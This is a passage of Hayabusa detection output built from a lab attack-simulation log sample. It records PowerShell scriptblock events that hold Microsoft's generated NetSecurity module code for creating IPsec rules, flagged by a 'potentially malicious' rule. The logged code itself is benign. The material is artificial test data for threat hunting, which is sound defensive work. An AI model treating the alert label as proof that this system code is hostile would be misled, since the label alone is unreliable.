[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.080 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"t')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 